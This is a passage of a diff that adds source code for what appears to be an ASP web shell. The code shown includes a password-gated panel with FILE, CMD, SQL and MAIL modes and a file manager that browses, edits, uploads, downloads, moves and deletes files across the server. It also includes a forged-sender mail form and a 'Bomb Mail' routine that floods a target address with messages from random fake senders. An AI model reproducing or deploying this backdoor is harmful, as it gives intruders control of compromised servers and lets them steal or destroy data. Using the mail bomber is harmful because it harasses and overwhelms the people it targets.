+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Value)
+end if
+Response.Write "</tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+rS.MoveNext
+loop
+rS.Close
+Response.Write "</table>" & vbNewLine
+end if
+
+Response.Write "<p><tt>(" & intAffected & " row(s) affected)</tt>"
+
+set rS=nothing
+set adoCon=nothing
+end if
+
+HtmlFooter()
+Destroy()
+end sub
+
+
+'###########################################################################################
+
+sub myMail()
+dim strFrom,strTo,strSubject,strBody,bHtml,intNumber,i,StartTime,EndTime,bDoIt
+dim objMail,objMsg
+
+strTo=Trim(Request.Form("to"))
+
+select case Request.Form("subcommand")
+case "Send"
+strFrom=Trim(Request.Form("from"))
+strSubject=Trim(Request.Form("subject"))
+strBody=Request.Form("body")
+bHtml=CBool(Request.Form("html"))
+case "Bomb"
+if IsNumeric(Request.Form("number")) then intNumber=Int(Request.Form("number"))
+strFrom=Session("strFrom")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+end select
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+strFrom=Session("strFrom")
+strTo=Session("strTo")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+intNumber=Session("intNumber")
+else
+bDoIt=true
+end if
+
+if (intNumber<=0) then intNumber=gBomb
+
+Session("strFrom")=strFrom
+Session("strTo")=strTo
+Session("strSubject")=strSubject
+Session("strBody")=strBody
+Session("bHtml")=bHtml
+Session("intNumber")=intNumber
+
+HtmlHeader("")
+HtmlMode()
+
+if bDoIt then
+select case Request.Form("subcommand")
+case "Send"
+if IsValidEmail(strTo) then
+set objMail=Server.CreateObject("CDONTS.NewMail")
+objMail.To=strTo
+objMail.From=strFrom
+objMail.Subject=strSubject
+objMail.Body=strBody
+if bHtml then
+objMail.BodyFormat=0 'HTML
+objMail.MailFormat=0 'MIME
+end if
+objMail.Send
+set objMail=nothing
+Response.Write "<b>M</b>essage was sent to " & strTo & " successfully." & vbNewLine
+end if
+case "Bomb"
+if IsValidEmail(strTo) then
+Response.Write "<b>B</b>ombing " & Replace(FormatNumber(intNumber,0),",",".") & " mail"
+if intNumber>1 then Response.Write "s"
+Response.Write " to " & strTo & " ... "
+StartTime=Timer
+set objMsg=Server.CreateObject("CDO.Message")
+objMsg.To=strTo
+Randomize
+for i=1 to intNumber
+objMsg.From=makeEmail()
+objMsg.Subject=makeText(Int((50-25+1)*Rnd+25))
+objMsg.TextBody=makeText(Int((100-50+1)*Rnd+50))
+objMsg.Send
+next
+set objMsg=nothing
+EndTime=Timer
+Response.Write howlong(EndTime-StartTime) & vbNewLine
+end if
+end select
+end if
+%>
+<p>
+<table border=1>
+<tr>
+<td width=50%>
+<form name=frmSend method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>a) <b>A</b>nonymous Mail</td>
+</tr>
+<tr>
+<td><b>F</b>rom:</td>
+<td><input type=text name=from value="<%=Server.HtmlEncode(strFrom)%>" size=25></td>
+</tr>
+<tr>
+<td><b>T</b>o:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>S</b>ubject:</td>
+<td><input type=text name=subject value="<%=Server.HtmlEncode(strSubject)%>" size=50></td>
+</tr>
+<tr>
+<td valign=top><b>B</b>ody:</td>
+<td><textarea name=body cols=37 rows=12><%=Server.HtmlEncode(strBody)%></textarea></td>
+</tr>
+<tr>
+<td><b>H</b>tml:</td>
+<td><input type=checkbox name=html value=1<%if bHtml=true then Response.Write " checked"%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Send></td>
+</tr>
+</table>
+</form>
+</td>
+<td width=50% valign=top>
+<form name=frmBomb method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>b) <b>B</b>omb Mail</td>
+</tr>
+<tr>
+<td><b>A</b>ddress:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>N</b>umber:</td>
+<td><input type=text name=number value=<%=intNumber%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Bomb></td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+function IsValidEmail(strEAddress)
+dim objRegExpr
+set objRegExpr = New RegExp
+objRegExpr.Pattern = "^[a-zA-Z0-9][\w\.-]*[a-zA-Z0-9]@[\w-\.]*[a-zA-Z0-9]\.[a-zA-Z]{2,7}$"
+objRegExpr.Global = true
+objRegExpr.IgnoreCase = False
+IsValidEmail = objRegExpr.Test(strEAddress)
+set objRegExpr = nothing
+end function
+
+'###########################################################################################
+
+function makeEmail()
+Randomize
+if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "." & zombie_array(Int((UBound(zombie_array)-0+1)*Rnd+0)) else makeEmail=makeText(8) & "@" & special_array(Int((UBound(special_array)-0+1)*Rnd+0))
+end function
+
+'###########################################################################################
+
+function makeText(intLen)
+dim strNewText,i
+strNewText=""
+Randomize
+for i=1 to intLen
+strNewText=strNewText & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
+next
+makeText=strNewText
+end function
+
+'###########################################################################################
+
+function howlong(intTime)
+if (intTime<60) then
+howlong=intTime & " second(s)"
+elseif (intTime<60*60) then
+howlong=FormatNumber(intTime/60,2) & " minute(s)"
+else
+howlong=FormatNumber(intTime/(60*60),2) & " hour(s)"
+end if
+end function
+
+'###########################################################################################
+
+sub Tree()
+dim path
+path=abspath(Request.Form("param"))
+if FSO.FolderExists(path) then
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<%
+tree_dir(path)
+%>
+</body>
+</html>
+<%
+else
+%>
+<script>alert('Folder not found !');window.close();</script>
+<%
+end if
+Destroy()
+end sub
+
+sub tree_dir(path)
+dim strAttrib,strSize
+
+on error resume next
+
+dim oFolder
+dim oSubFolders,oSubFolder
+dim oFiles,oFile
+dim oSubFolders2,oSubFolder2
+dim oFiles2,oFile2
+
+set oFolder=FSO.GetFolder(path)
+set oSubFolders=oFolder.SubFolders
+set oFiles=oFolder.Files
+
+Response.Write "<p>" & FSO.GetAbsolutePathName(path)
+
+strAttrib=GetAttributes(oFolder.Attributes)
+
+if strAttrib<>" " then Response.Write " (" & GetAttributes(oFolder.Attributes) & ")"
+
+Response.Write vbNewLine
+
+if (oSubFolders.Count>0) or (oFiles.Count>0) then
+%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Type</font></td>
+<td align=center><font color=#FFFF00>Modified</font></td>
+<td align=center><font color=#FFFF00>Attributes</font></td>
+</tr>
+<%
+' liet ke thu muc
+for each oSubFolder in oSubFolders
+%>
+<tr bgcolor=#000000>
+<td><%=oSubFolder.Name%></td>
+<td align=right> </td>
+<td align=center>DIR</td>
+<td align=center><%=FormatDate(oSubFolder.DateLastModified)%></td>
+<td><%=GetAttributes(oSubFolder.Attributes)%></td>
+</tr>
+<%
+next
+
+' liet ke file
+for each oFile in oFiles
+%>
+<tr bgcolor=#000000>
+<td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetExtensionName(path & "\" & oFile.Name)="url") then Response.Write " title=""" & FindLink(path & "\" & oFile.Name) & """"%>><%=oFile.Name%></td>
+<td align=right><%=FormatSize(oFile.Size)%></td>
+<td align=center><%=oFile.Type%></td>
+<td align=center><%=FormatDate(oFile.DateLastModified)%></td>
+<td><%=GetAttributes(oFile.Attributes)%></td>
+</tr>
+<%
+next
+strSize=FormatSize(oFolder.Size)
+%>
+<tr bgcolor=#000000>
+<td colspan=5 align=center><%=oSubFolders.Count%> folder(s), <%=oFiles.Count%> file(s)<%if strSize<>"" then Response.Write " (" & strSize & ")"%></td>
+</tr>
+</table>
+<%
+' goi de qui
+for each oSubFolder in oSubFolders
+set oSubFolder2=oSubFolder.SubFolders
+set oFile2=oSubFolder.Files
+
+if (oSubFolder2.Count>0) or (oFile2.Count>0) then
+tree_dir(oSubFolder.ParentFolder & "\" & oSubFolder.Name)
+end if
+
+set oSubFolder2=nothing
+set oFile2=nothing
+next
+end if
+
+set oSubFolder=nothing
+set oFiles=nothing
+set oFolder=nothing
+end sub
+
+'###########################################################################################
+
+sub Editor()
+dim f,name,path
+
+on error resume next
+
+HtmlHeader("")
+
+name=Request.Form("param")
+path=addslash(targetPath) & name
+
+select case Request.Form("subcommand")
+case "Save","SaveAs"
+set f=FSO.OpenTextFile(path,2,true,-2)
+if Err.Number<>0 then
+gMsg="Can not write to the file """ & name & """, permission denied!"
+Err.Clear
+else
+f.Write Request.Form("content")
+end if
+set f=nothing
+set f=FSO.OpenTextFile(path,1,false,-2)
+case else
+if not FSO.FileExists(path) then
+gMsg="The file """ & name & """ does not exist"
+set f=FSO.CreateTextFile(path,false)
+if Err.Number<>0 then
+gMsg=gMsg & ", also unable to create new file."
+Err.Clear
+else
+gMsg=gMsg & ", created new file."
+end if
+else
+set f=FSO.OpenTextFile(path,1,false,-2)
+if Err.Number<>0 then
+gMsg="Can not read from the file """ & name & """, permission denied!"
+Err.Clear
+end if
+end if
+end select
+%>
+<% if gMsg<>"" then Response.Write "<script>alert('" & gMsg & "')</script>" & vbNewLine %>
+<p><b>E</b>diting - "<%=path%>"<br>
+<form name=frmFile method=post action="<%=gURL%>">
+<b>W</b>rap<input type=checkbox id=wrap onclick="EditorCommand('WordWrap')">
+<center>
+<table width=100%>
+<tr><td align=center>
+<textarea name=content rows=25 cols=46 style="width:580;height:330" wrap=off><%=Server.HTMLEncode(f.ReadAll)%></textarea>
+</td></tr>
+<tr><td align=center>
+<input type=button value=Save onclick="EditorCommand('Save')"> <input type=button value="Save As" onclick="EditorCommand('SaveAs')"> <input type=button value=Reload onclick="EditorCommand('Reload')"> <input type=button value=Close onclick="window.close()">
+</td></tr>
+</table>
+</center>
+<script>frmFile.content.focus()</script>
+<input type=hidden name=command value=Edit>
+<input type=hidden name=subcommand value="">
+<input type=hidden name=param value="<%=name%>">
+<input type=hidden name=folder value="<%=Request.Form("folder")%>">
+</form>
+<%
+set f=nothing
+HtmlJsEditor()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub ChangeAttributesItem()
+dim item,itemType,itemName,itemPath,itemAttrib
+
+itemType=Request.Form("command")
+itemName=Request.Form("param")
+itemPath=addslash(targetPath) & itemName
+
+HtmlHeader("")
+
+select case itemType
+case "ChangeAttributesFile" set item=FSO.GetFile(itemPath)
+case "ChangeAttributesFolder" set item=FSO.GetFolder(itemPath)
+end select
+
+if Request.Form("subcommand")="change" then
+itemAttrib=int(Request.Form("r"))
+itemAttrib=itemAttrib+int(Request.Form("h"))
+itemAttrib=itemAttrib+int(Request.Form("a"))
+itemAttrib=itemAttrib+int(Request.Form("s"))
+on error resume next
+item.Attributes=int(itemAttrib)
+if Err.Number<>0 then Response.Write "<script>alert('Permission denined')</script>" & vbNewLine
+end if
+
+itemAttrib=item.Attributes
+%>
+<b>C</b>hange attributes - "<%=itemName%>"
+<p align=center>
+<form name=frmAttrib method=post action="<%=gURL%>">
+<input type=hidden name=command value="<%=itemType%>">
+<input type=hidden name=subcommand value=change>
+<input type=hidden name=folder value="<%=targetPath%>">
+<input type=hidden name=param value="<%=itemName%>">
+<table>
+<tr>
+<td><input type=checkbox name=r value=1 <%if (itemAttrib and 1)>0 then Response.Write " checked"%>>Read-only</td>
+<td><input type=checkbox name=h value=2 <%if (itemAttrib and 2)>0 then Response.Write " checked"%>>Hidden</td>
+</tr>
+<tr>
+<td><input type=checkbox name=a value=32 <%if (itemAttrib and 32)>0 then Response.Write " checked"%>>Archive</td>
+<td><input type=checkbox name=s value=4 <%if (itemAttrib and 4)>0 then Response.Write " checked"%>>System</td>
+</tr>
+</table><br>
+<input type=button value=OK onclick="frmAttrib.submit()"> <input type=button value=Close onclick="window.close()">
+</form>
+</p>
+<%
+set itemType=nothing
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub OpenFolder()
+if Trim(Request.Form("folder"))="" then 
+if Trim(Request.Form("param"))="" then targetPath=root else targetPath=abspath(Trim(Request.Form("param")))
+else
+targetPath=addslash(Trim(Request.Form("folder"))) & Trim(Request.Form("param"))
+end if
+end sub
+
+'###########################################################################################
+
+sub CreateItem()
+dim itemType,itemName,itemPath 
+itemType=request.form("command")
+itemName=request.form("param")
+itemPath=addslash(targetPath) & itemName
+
+on error resume next
+
+select case itemType
+case "NewFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateFolder(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the folder """ & itemName & """, an error occured..."
+else
+gMsg="Created the folder """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the folder """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+case "NewFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateTextFile(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the file """ & itemName & """, an error occured..."
+else
+gMsg="Created the file """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the file """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+end select
+end sub
+
+'###########################################################################################
+
+sub ZipInfo()
+dim path,zip,zipfile,i
+
+path=addslash(targetPath) & Request.Form("param")
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<p><%=path%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Ratio</font></td>
+<td align=center><font color=#FFFF00>Packed</font></td>
+<td align=center><font color=#FFFF00>Modify</font></td>
+<td align=center><font color=#FFFF00>Path</font></td>
+</tr>
+<%
+set zip=new clszip
+zip.ZipLoad(path)
+set zipfile=new clsZipFile
+
+for i=1 to zip.FileCount
+set zipfile=zip.GetFile(i)
+with zipfile
+if not (.IsFolder Or .IsOverall) then
+Response.Write "<tr bgcolor=#000000>" & vbNewLine
+Response.Write " <td>" & .Name & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Size,0) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & .Ratio & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Packed,0) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(.Modified) & "</td>" & vbNewLine
+Response.Write " <td>" & .Path & "</td>" & vbNewLine
+end if
+end with
+next
+
+set ZipFile=nothing
+set zip=nothing
+%>
+</table>
+</p>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Delete()
+dim i,ndir,nfile,itemName,itemPath
+
+on error resume next
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>D</b>elete folder(s)..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFolder itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>D</b>elete file(s)..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFile itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Copy()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+cp_dst=Trim(Request.Form("cp"))
+if cp_dst="" then exit sub
+cp_dst=abspath(cp_dst)
+Session("cp_dst")=cp_dst
+
+if FSO.FolderExists(cp_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>C</b>opying folder(s) to """ & cp_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFolder itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>C</b>opying file(s) to """ & cp_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFile itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Move()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+mv_dst=Trim(Request.Form("mv"))
+if mv_dst="" then exit sub
+mv_dst=abspath(mv_dst)
+Session("mv_dst")=mv_dst
+
+if FSO.FolderExists(mv_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>M</b>oving folder(s) to """ & mv_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFolder itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+set item=nothing
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>M</b>oving file(s) to """ & mv_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFile itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+end sub
+
+'###########################################################################################
+
+sub RenameItem()
+dim item,itemType,itemName,itemPath
+dim param,newName
+
+itemType=request.form("command")
+param=split(request.form("param"),"|")
+itemName=param(0)
+newName=param(1)
+itemPath=addslash(targetPath) & newName
+
+on error resume next
+
+select case itemType
+case "RenameFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFolder(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the folder """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the folder """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the folder """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+case "RenameFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFile(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the file """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the file """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the file """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+end select
+
+set item=nothing
+end sub
+
+'###########################################################################################
+
+sub List()
+dim objFolder,folder,item,intCount,bOpen,ext,count
+if not FSO.FolderExists(targetPath) then
+gMsg="Folder not found"
+else
+on error resume next
+set objFolder=FSO.GetFolder(targetPath)
+if Err.Number<>0 then
+gMsg="Can't open folder"
+else
+intCount=objFolder.SubFolders.Count+objFolder.Files.Count
+if Err.Number<>0 then
+gMsg="Permission denied"
+else
+%>
+<input type=button value=Refresh onclick="Command('Refresh')">
+<input type=button value="New File" onclick="Command('NewFile')">
+<input type=button value="New Folder" onclick="Command('NewFolder')">
+<input type=button value=Upload onclick="frmUpload.max.focus()">
+<input type=button value=Tree onclick="Command('Tree')">
+<%
+bOpen=true
+end if
+end if
+end if
+HtmlQuick()
+if gMsg<>"" then Response.Write "<p>" & gMsg & vbNewLine
+if bOpen then
+count=0
+if intCount>0 then Response.Write "<p>" & objFolder.SubFolders.Count & " subfolder(s)<br>" & vbNewLine & objFolder.Files.Count & " file(s)<br>" & vbNewLine
+if bSize then Response.Write "(" & FormatSize(objFolder.Size) & ")<br>" & vbNewLine
+%>
+<p>
+<table border=1 width=100%>
+<tr>
+<td><b>N</b>ame</td>
+<td align=center><b>S</b>ize</td>
+<td align=center><b>T</b>ype</td>
+<td align=center><b>M</b>odified</td>
+<td><b>A</b>ttributes</td>
+<td><b>A</b>ctions</td>
+<tr>
+<%
+if not isroot(targetPath) then
+%>
+<tr>
+<td><a href="javascript:Command('LevelRoot')" title="Up Root Level">\</a></td>
+<td> </td>
+<td align=center>Root</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<tr>
+<td><a href="javascript:Command('LevelUp')" title="Up One level">..</a></td>
+<td> </td>
+<td align=center>Up</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<%
+end if
+if intCount>0 then
+HtmlJsForm()
+%>
+<form name=theForm method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+<%
+for each item in objFolder.SubFolders
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('OpenFolder',"" & item.Name & "")""" 
+if Len(item.Name)>gMax then Response.Write " title=""" & item.Name & """"
+Response.Write ">" & FormatName(item.Name) & "</a></td>" & vbNewLine
+Response.Write " <td align=right> </td>" & vbNewLine
+Response.Write " <td align=center>DIR</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=d value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFolder',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFolder',"" & item.Name & "")""></td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+for each item in objFolder.Files
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('Download',"" & item.Name & "")"""
+ext=FSO.GetExtensionName(addslash(targetPath) & item.Name)
+re.IgnoreCase = true
+re.Pattern = "^" & ext & ",|," & ext & ",|," & ext & "$"
+if re.Test(lnkExt) then
+Response.Write " title=""-> " & Server.Htmlencode(FindLink(addslash(targetPath) & item.Name)) & """"
+elseif Len(item.Name)>gMax then
+Response.Write " title=""" & item.Name & """"
+end if
+
+Response.Write ">" & FormatName(item.Name) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatSize(item.Size) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & item.Type & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=f value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFile',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFile',"" & item.Name & "")"">"
+
+if re.Test(editExt) then
+Response.Write "<input type=button value=Edit onclick=""Command('Edit',"" & item.Name & "")"">"
+end if
+
+if Lcase(ext)="zip" then
+Response.Write "<input type=button value=Info onclick=""Command('ZipInfo',"" & item.Name & "")"">"
+end if
+
+Response.Write "</td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+if count>0 then
+%>
+<tr>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td><input type=checkbox name=allbox title="Select All" onclick="CheckAll()"><input type=button value=Delete title="Delete Selected Item(s)" onclick="DoWork('Delete')"></td>
+</tr>
+<%
+end if
+%>
+</table>
+<%
+if count>1 then
+%>
+<p>
+<table>
+<tr><td><b>C</b>opy selected item(s) to</td><td><input type=text name=cp value="<%=Session("cp_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.cp_bt.click();"> <input type=button id=cp_bt value=Copy onclick="DoWork('Copy')"></td></tr>
+<tr><td><b>M</b>ove selected item(s) to</td><td><input type=text name=mv value="<%=Session("mv_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.mv_bt.click();"> <input type="button" id=mv_bt value=Move onclick="DoWork('Move')"></td></tr>
+</table>
+<%
+end if
+%>
+</form>
+</table>
+<%
+end if
+set objFolder=nothing
+%>
+<p><b>U</b>pload file(s) to "<%=targetPath%>"
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=gURL%>">
+<input type=hidden name=folder value="<%=targetPath%>">
+Max: <input type=text name=max value=5 size=5> <input type=button value=# onclick="setid()"><br>
+<table>
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload>
+</form>
+<script>
+setid();
+function setid() {
+str='<br>';
+if (frmUpload.max.value<=0) frmUpload.max.value=1;
+for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end if
+%>
+<form name=frmFile method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=param value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+</form>
+<script>frmAddress.param.focus()</script>
+<%
+HtmlJsCommand()
+end sub
+
+'###########################################################################################
+
+sub Upload()
+dim objUpload,f,max,i,name,path,size,success
+
+HtmlHeader("")
+HtmlMode()
+
+set objUpload=New clsUpload
+
+targetPath=objUpload.Fields("folder").Value
+max=objUpload.Fields("max").Value
+
+gMsg= "<b>U</b>pload..." & vbNewLine
+
+for i=1 to max
+name=objUpload.Fields("file" & i).FileName
+size=objUpload.Fields("file" & i).Length
+if (name<>"") and (size>0) then
+gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+path=addslash(targetPath) & name
+objUpload.Fields("file" & i).SaveAs path
+if FSO.FileExists(path) then
+on error resume next
+set f=FSO.GetFile(path)
+if IsObject(f) then
+if f.Size=size then success=true else success=false
+end if
+set f=nothing
+end if
+if success then gMsg=gMsg & "success" else gMsg = gMsg & "fail"
+end if
+next
+
+set objUpload=nothing
+
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Download()
+dim oStream
+dim szFileName
+szFileName=addslash(Request.Form("folder")) & Request.form("Param")
+if FSO.FileExists(szFileName) then
+set oStream=Server.CreateObject("ADODB.Stream")
+oStream.Type=1
+oStream.Open
+on error resume next
+oStream.LoadFromFile(szFileName)
+if Err.Number=0 then
+Response.AddHeader "Content-Disposition", "attachment; filename=" & FSO.GetFileName(szFileName)
+Response.AddHeader "Content-Length", oStream.Size
+Response.ContentType="bad/type" 'yeu cau ie hien hop thoai save-as
+Response.BinaryWrite oStream.Read
+end if
+oStream.Close
+set oStream=nothing
+end if
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Logout()
+Session.Abandon
+Response.Redirect gURL
+Destroy()
+end sub
+
+sub Init()
+Session("switch")=false
+set FSO=Server.CreateObject("Scripting.FileSystemObject")
+set re=new regexp
+end sub
+
+sub Destroy()
+set FSO=nothing
+set re=nothing
+Response.End
+end sub
+
+'###########################################################################################
+
+sub Secure()
+if (Session("allow")=1) then exit sub
+if (gPassword="") then
+Session("allow")=1
+Session("mode")=0
+exit sub
+end if
+if (Request.Form("command")="Login") then
+if Request.Form("password")=gPassword then
+Session("allow")=1
+Session("mode")=CInt(Request.Form("mode"))
+exit sub
+end if
+end if
+
+HtmlHeader("")
+%>
+<form name=frmLogin method=post action="<%=gURL%>">
+<table>
+<tr>
+<td><b>M</b>ode:</td>
+<td>
+<select name=mode>
+<option value=0 selected>FILE
+<option value=1>CMD
+<option value=2>SQL
+<option value=3>MAIL
+</select>
+</td>
+</tr>
+<tr>
+<td><b>P</b>assword:</td>
+<td><input type=password name=password></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=command value=Login></td>
+</tr>
+</table>
+</form>
+<script>frmLogin.password.focus()</script>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub HtmlJsForm()
+%>
+<script>
+function CheckAll() {
+var fmobj=document.theForm;
+for (var i=0; i<fmobj.elements.length;i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (!e.disabled)) {
+e.checked=fmobj.allbox.checked;
+}
+}
+if (fmobj.allbox.checked) {
+fmobj.allbox.title='Clear All';
+} else {
+fmobj.allbox.title='Select All';
+}
+}
+
+function DoWork(cmd) {
+var s;
